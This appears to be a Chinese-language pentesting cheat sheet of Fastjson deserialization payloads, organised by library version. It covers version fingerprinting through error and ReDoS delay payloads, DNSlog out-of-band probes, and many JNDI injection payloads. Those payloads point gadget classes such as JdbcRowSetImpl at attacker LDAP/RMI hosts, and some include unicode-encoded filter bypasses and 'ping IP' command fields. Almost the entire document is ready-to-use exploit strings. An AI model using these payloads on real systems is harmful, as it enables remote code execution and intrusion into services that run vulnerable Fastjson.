Fastjson漏洞检测
对于不需要拿权限仅需要渗透的站点来说,使用回弹即可验证
但对于Fastjson出网检测的payload来说,回显不意味着存在漏洞,仍需进一步利用
DNS
1
| 触发DNS请求(服务器需要出网,且外围设备开放了DNS协议)
|
TCP/UDP端口判断
1
| 用VPS的python开启一个web服务,触发请求(服务器出网,但没有配置DNS)
|
Fastjson版本判断
报错
1
| 通过构造无闭合的json字符串让组件抛出异常,异常中可能会显示版本
|
显错
1
2
3
4
5
| payload1:
{"@type": "java.lang.AutoCloseable"
payload2:
["test":1]
|
JNDI请求延迟(Fastjson <= 1.2.47)
1
| 将ldap或rmi地址设置成一个不常见的外网IP地址(将会延迟),访问内网地址127.0.0.1(瞬间返回)
|
DOS延迟(Fastjson <= 1.2.59)
1
2
3
| a的个数越多延迟效果越明显,但此payload可能会影响业务系统运行
payload:
{"regex":{"$ref":"$[blue rlike '`[a-zA-Z]+(([a-zA-Z])?[a-zA-Z]*)*$']"},"blue":"aaaa!"}
|
DNS判断
1
2
3
4
5
6
7
8
| Fastjson <= 1.2.47:
{"name":{"@type":"java.net.InetAddress","val":"DNS地址"}}
Fastjson >= 1.2.37:
{{"@type":"java.net.URL","val":"http://weffewfddd.dnslog.cn"}:"aaa"}
1.1.16 <= Fastjson <= 1.2.24:
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxxdsf.dnslog.cn:9999/POC","autoCommit":true}}
|
Fastjson出网检测
能够在dnslog收到回弹并不代表着存在fastjson反序列化漏洞
1
| {"@type":"java.net.Inet6Address","val":"DNS地址"}
|
1
| {"@type":"java.net.Inet4Address","val":"DNS地址"}
|
1
| {"@type":"java.net.InetSocketAddress"{"address":,"val":"DNS地址"}}
|
Fastjson <=1.2.24
1
| {"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip/a","autoCommit":true}}
|
unicode编码
仅对@type的键值、dataSourceName的键进行编码
1
| {"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://ip/a","autoCommit":true}}
|
Fastjson<=1.2.41
前提:autoTypeSupport属性为true才能使用(fastjson>=1.2.25默认为false)
1
| {"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://ip/a","autoCommit":true}
|
Fastjson<=1.2.42
前提:autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)
1
| {"@type":"LLcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://ip/a","autoCommit":true}
|
Fastjson<=1.2.43
前提:autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)
1
| {"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://ip/a","autoCommit":true}
|
Fastjson<=1.2.45
前提:autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)
1
| {"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://ip/a"}}
|
Fastjson<=1.2.47
1
| {"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip/a","autoCommit":true}}
|
Fastjson<=1.2.62
CVE-2020-8840
1
| {"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://ip/a"}
|
Fastjson<=1.2.66
前提:autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)
1
| {"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://ip/a"}
|
1
| {"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://ip/a"}
|
1
| {"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://ip/a"}}
|
Fastjson<=1.2.67
1
| {"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://ip/a"}
|
1
| {"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://ip/a"],"Realms":[""]}
|
1
| {"@type":"com.caucho.config.types.ResourceRef","lookupName":"rmi://ip/a"}
|
1
| {"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"rmi://ip/a"}}
|
Fastjson<=1.2.68
1
| {"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"rmi://ip/a"}
|
1
| {"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"rmi://ip/a"}
|
Fastjson<=1.2.80
1
| {"@type": "java.lang.Exception","@type": "com.kk.domain.Poc","name":"ping IP"}
|
未知
1
| {"@type":"java.lang.Exception","@type":"com.github.isafeblue.fastjson.SimpleException","domain": "ping IP"}
|
1
| {"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"rmi://ip/a"}
|
1
| {"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"rmi://ip/a","rollbackOnly":null}
|
1
| {"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://ip/a"}
|
1
| {"a":{"@type":"java.lang.AutoCloseable","@type":"java.io.Reader"},"rand1":{"@type":"java.net.InetSocketAddress",{"address":,"val":"DNS地址"}}}
|
